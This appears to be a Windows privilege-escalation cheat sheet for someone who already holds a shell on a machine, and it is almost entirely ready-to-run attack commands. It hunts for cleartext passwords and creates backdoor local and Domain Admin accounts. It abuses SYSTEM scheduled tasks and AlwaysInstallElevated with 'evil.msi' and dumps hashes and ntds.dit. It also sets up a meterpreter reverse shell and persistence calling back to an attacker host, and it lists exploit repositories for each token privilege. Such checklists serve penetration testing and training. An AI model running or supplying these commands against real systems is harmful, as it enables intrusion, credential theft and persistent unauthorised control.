Windows Privesc checklist

You have a shell on a Windows Device, now what?

DOMAIN ENUM (if joined)

BloodHound / SharpHound

Who are we? What can we do? Initial Enumeration

WHOAMI?

whoami
echo %username%

PRIVILEGES?

whoami /priv

SYSTEM INFO

systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,Version

SERVICES

wmic service get name,startname
net start

ADMIN CHECK

net localgroup administrators
net user

NETWORK

netstat -anoy
route print
arp -A
ipconfig /all

USERS

net users
net user
net localgroup

FIREWALL

netsh advfirewall firewall show rule name=all

SCHEDULED TASKS

schtasks /query /fo LIST /v > schtasks.txt

INSTALLATION RIGHTS

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

PRIVESC CHECKLIST

UNQUOTED SERVICE PATHS

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v '"'

WEAK SERVICE PERMISSIONS

accesschk.exe -uwcqv <service>
sc qc <service>
icacls "C:\Path\To\Service.exe"

FILE TRANSFER OPTIONS

certutil.exe
powershell (IEX)
SMB / FTP / TFTP / VBScript

CLEAR TEXT CREDENTIALS

findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *.config*

WEAK FILE PERMISSIONS

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

NEW ADMIN USER (Local/Domain)

net user bob P@ssw0rd! /add
net localgroup administrators bob /add
net group "Domain Admins" bob /add /domain

SCHEDULED TASK ABUSE

ENUM

schtasks /query /fo LIST /v > tasks.txt

CREATE SYSTEM TASK

schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\bobMaint.exe"

RUN TASK

schtasks /run /tn "RUNME"

POST EXPLOIT ENUMERATION

NETWORK USERS

net user
net user <target>
net localgroup administrators

NT AUTHORITY CHECKS

whoami
accesschk.exe /accepteula
MS09-012.exe "whoami"

HASH DUMP

meterpreter > hashdump

EXFILTRATE ntds.dit

Use secretsdump.py or disk capture tools

INSTALLER ABUSE

AlwaysInstallElevated = 1
msiexec /i evil.msi

SHARE ENUMERATION

net share
net use
net use Z: \\TARGET\SHARE /persistent:yes

WINDOWS PRIV ESC: GITHUB EXPLOITS

Privilege Name	GitHub PoC
SeDebugPrivilege	github.com/bruno-1337/SeDebugPrivilege-
SeImpersonatePrivilege	github.com/itm4n/PrintSpoofer
SeAssignPrimaryToken	github.com/b4rdia/HackTricks
SeTcbPrivilege	github.com/hatRiot/token-priv
SeCreateTokenPrivilege	github.com/hatRiot/token-priv
SeLoadDriverPrivilege	github.com/k4sth4/SeLoadDriverPrivilege
SeTakeOwnershipPrivilege	github.com/hatRiot/token-priv
SeRestorePrivilege	github.com/xct/SeRestoreAbuse
SeBackupPrivilege	github.com/k4sth4/SeBackupPrivilege
SeIncreaseQuotaPrivilege	github.com/b4rdia/HackTricks
SeSystemEnvironment	github.com/b4rdia/HackTricks
SeMachineAccount	github.com/b4rdia/HackTricks
SeTrustedCredManAccess	learn.microsoft.com/…trusted-caller
SeRelabelPrivilege	github.com/decoder-it/RelabelAbuse
SeManageVolumePrivilege	github.com/CsEnox/SeManageVolumeExploit
SeCreateGlobalPrivilege	github.com/b4rdia/HackTricks

Notes:

PrintSpoofer is gold for SeImpersonatePrivilege.
SeManageVolume has practical field PoCs.

MAINTAINING ACCESS

METERPRETER REVERSE SHELL SETUP

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploit

PERSISTENCE

meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>

PORT FORWARDING

meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>

SYSTEM MIGRATION

meterpreter > run post/windows/manage/migrate
meterpreter > migrate <PID>

EXECUTE PAYLOADS

powershell.exe "C:\Tools\privesc.ps1"

RESOURCES

Windows Exploit Suggester (kind of old)

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Windows privesc checker (contemporary)

https://github.com/itm4n/PrivescCheck

Cross Compile Payloads (Linux > Windows)

apt-get install mingw-w64

x86:

i686-w64-mingw32-gcc hello.c -o hello.exe

x64:

x86_64-w64-mingw32-gcc hello.c -o hello64.exe

Additional Reading

https://www.fuzzysecurity.com/tutorials/16.html

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation